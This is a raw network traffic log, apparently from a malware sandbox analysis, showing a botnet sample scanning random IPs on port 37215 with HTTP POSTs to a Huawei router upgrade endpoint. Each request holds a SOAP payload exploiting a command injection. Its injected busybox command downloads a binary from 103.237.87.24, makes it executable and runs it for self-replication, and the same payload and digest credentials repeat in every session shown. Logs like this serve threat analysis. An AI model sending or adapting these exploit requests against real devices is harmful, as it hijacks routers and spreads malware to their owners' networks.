69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  460192.168.2.134560841.227.126.24137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.116278887 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  461192.168.2.135635474.68.222.21337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.116293907 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  462192.168.2.1351040157.10.29.22337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.116329908 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  463192.168.2.1354394145.188.155.21237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.116333008 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  464192.168.2.1346254157.60.179.7637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.116334915 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  465192.168.2.136025014.58.173.1937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.116534948 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  466192.168.2.133904041.223.210.15637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.116539955 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  467192.168.2.133505041.144.133.19737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.116559982 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  468192.168.2.135981841.103.162.6937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.116561890 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  469192.168.2.1359694157.109.59.25537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.116590023 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  470192.168.2.135980041.57.98.6637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.116595984 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
